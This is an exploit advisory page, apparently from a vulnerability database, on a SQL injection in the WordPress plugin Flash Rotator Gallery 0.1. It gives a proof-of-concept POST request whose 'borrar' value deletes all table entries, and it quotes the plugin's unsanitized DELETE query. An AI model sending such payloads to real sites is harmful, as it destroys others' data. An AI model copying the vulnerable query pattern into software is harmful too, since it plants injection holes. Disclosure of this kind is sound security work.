WordPress plugin Flash Rotator Gallery SQL injection

Published
Credit
Risk
2017.03.13
malwrforensics
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

# Exploit Title: WordPress plugin Flash Rotator Gallery - SQL injection
# Date: 2017-03-12
# Exploit Author: malwrforensics
# Vendor Homepage: http://www.webpsilon.com/wordpress-plugins/flash-rotator-gallery/
# Software Link: https://downloads.wordpress.org/plugin/flash-rotator-gallery.zip
# Version: 0.1
# Tested on: Linux

HTTP request data:

POST http://192.168.205.102/wordpress/wp-admin/admin.php?page=flash_rotator_gallery.php HTTP/1.1
<snip>

borrar=100+or+id>0 #delete all entries


Technical details:
Affected file: flash-rotator-gallery.php
<snip>

if(isset($_POST['borrar'])) {
$sql = "DELETE FROM $table_name WHERE id = ".$_POST['borrar'].";"; #$_POST['borrar'] is not sanitized
$wpdb->query($sql);

<snip>

Thanks.


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com